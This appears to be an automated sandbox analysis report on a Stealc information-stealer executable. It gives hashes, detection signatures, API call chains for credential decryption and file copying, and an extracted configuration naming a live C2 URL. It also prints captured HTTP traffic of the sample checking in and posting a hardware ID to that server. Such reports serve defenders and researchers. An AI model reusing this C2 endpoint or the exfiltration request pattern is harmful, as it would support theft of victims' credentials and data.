Edit tour

Windows Analysis Report
uCEeVGAWIB.exe

Overview

General Information

Sample name:	uCEeVGAWIB.exe renamed because original name is a hash value
Original sample name:	9a4891bcf21b6639412f96c108a27744.exe
Analysis ID:	1542883
MD5:	9a4891bcf21b6639412f96c108a27744
SHA1:	7a7052586f6b35e6b5594528a2b84ca62bb14218
SHA256:	4dbfa3d8eef4144e8d2d90fa3f91d14aa7f09063aa0d9b5c7a17488f93ac861e
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Machine Learning detection for sample

Searches for specific processes (likely to inject)

AV process strings found (often used to terminate AV products)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse usering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Extensive use of GetProcAddress (often used to hide API calls)

Found evaded block containing many API calls

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

uCEeVGAWIB.exe (PID: 1120 cmdline: "C:\Users\user\Desktop\uCEeVGAWIB.exe" MD5: 9A4891BCF21B6639412F96C108A27744)

WerFault.exe (PID: 3004 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1120 -s 1052 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://94.141.122.159/baf27292fb61e144.php", "Botnet": "LogsDiller"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2241173522.000000000089A000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1318:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.2173056951.0000000000B80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: uCEeVGAWIB.exe PID: 1120	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: uCEeVGAWIB.exe PID: 1120	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.uCEeVGAWIB.exe.400000.1.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.uCEeVGAWIB.exe.400000.1.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.uCEeVGAWIB.exe.810e67.2.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.3.uCEeVGAWIB.exe.b80000.1.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.3.uCEeVGAWIB.exe.b80000.1.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.uCEeVGAWIB.exe.810e67.2.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 1 entries

Suricata Signatures

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-26T19:22:28.565437+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	49710	94.141.122.159	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000003.2173056951.0000000000B80000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: StealC {"C2 url": "http://94.141.122.159/baf27292fb61e144.php", "Botnet": "LogsDiller"}

Multi AV Scanner detection for submitted file

Source: uCEeVGAWIB.exe

ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: uCEeVGAWIB.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,	0_2_0040C820
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00407240
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00409AC0
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_00418EA0
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	0_2_00409B60
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_008174A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_008174A7
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00819DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	0_2_00819DC7
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00829107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00829107
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00819D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00819D27
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0081CA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,	0_2_0081CA87

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

Unpacked PE file: 0.2.uCEeVGAWIB.exe.400000.1.unpack

Source: uCEeVGAWIB.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040E430
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_004138B0
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_00414570
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00414910
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040ED20
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040BE70
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040DE10
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_004016D0
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040DA80
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_00413EA0
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040F6B0
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0081C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0081C0D7
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0081DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0081DCE7
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0081E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0081E077
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00824107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00824107
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0081F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0081F917
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00811937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00811937
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0081E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0081E697
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0081EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0081EF87
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_008247D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_008247D7
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00823B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00823B17
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00824B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00824B77

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49710 -> 94.141.122.159:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://94.141.122.159/baf27292fb61e144.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 94.141.122.159Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /baf27292fb61e144.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGIHost: 94.141.122.159Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 33 42 41 42 45 38 31 44 44 33 41 34 30 34 33 37 32 38 33 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 2d 2d 0d 0a Data Ascii: ------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="hwid"13BABE81DD3A4043728354------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="build"LogsDiller------KJDGDBFBGIDGIEBGHCGI--

Source: Joe Sandbox View

ASN Name: UNITLINE_RST_NET1RostovnaDonuRU UNITLINE_RST_NET1RostovnaDonuRU

Source: unknown	TCP traffic detected without corresponding DNS query: 94.141.122.159
Source: unknown	TCP traffic detected without corresponding DNS query: 94.141.122.159
Source: unknown	TCP traffic detected without corresponding DNS query: 94.141.122.159
Source: unknown	TCP traffic detected without corresponding DNS query: 94.141.122.159
Source: unknown	TCP traffic detected without corresponding DNS query: 94.141.122.159
Source: unknown	TCP traffic detected without corresponding DNS query: 94.141.122.159
Source: unknown	TCP traffic detected without corresponding DNS query: 94.141.122.159
Source: unknown	TCP traffic detected without corresponding DNS query: 94.141.122.159

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

Code function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00404880

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 94.141.122.159Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /baf27292fb61e144.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGIHost: 94.141.122.159Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 33 42 41 42 45 38 31 44 44 33 41 34 30 34 33 37 32 38 33 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 2d 2d 0d 0a Data Ascii: ------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="hwid"13BABE81DD3A4043728354------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="build"LogsDiller------KJDGDBFBGIDGIEBGHCGI--

Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, uCEeVGAWIB.exe, 00000000.00000002.2241108646.000000000088E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.141.122.159
Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.141.122.159/
Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.0000000000918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.141.122.159/U
Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.141.122.159/Y
Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.141.122.159/baf27292fb61e144.php
Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.141.122.159/baf27292fb61e144.php3F
Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.141.122.159/baf27292fb61e144.php?F
Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.0000000000918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.141.122.159/baf27292fb61e144.phpG
Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.141.122.159/baf27292fb61e144.phpOG
Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.0000000000918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.141.122.159/baf27292fb61e144.phpR
Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.141.122.159/baf27292fb61e144.phpS
Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.141.122.159/ws
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2241173522.000000000089A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

Code function: String function: 004045C0 appears 317 times

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1120 -s 1052

Source: uCEeVGAWIB.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2241173522.000000000089A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: uCEeVGAWIB.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@2/5@0/1

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

Code function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00419600

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

Code function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00413720

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\O8IY84DZ.htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1120

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\706d4a47-8d0e-4d9e-99cd-af4434e793ab

Jump to behavior

Source: uCEeVGAWIB.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: uCEeVGAWIB.exe

ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Users\user\Desktop\uCEeVGAWIB.exe "C:\Users\user\Desktop\uCEeVGAWIB.exe"
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1120 -s 1052

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

Unpacked PE file: 0.2.uCEeVGAWIB.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

Unpacked PE file: 0.2.uCEeVGAWIB.exe.400000.1.unpack

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

Code function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00419860

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0041B035 push ecx; ret	0_2_0041B048
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0082B29C push ecx; ret	0_2_0082B2AF
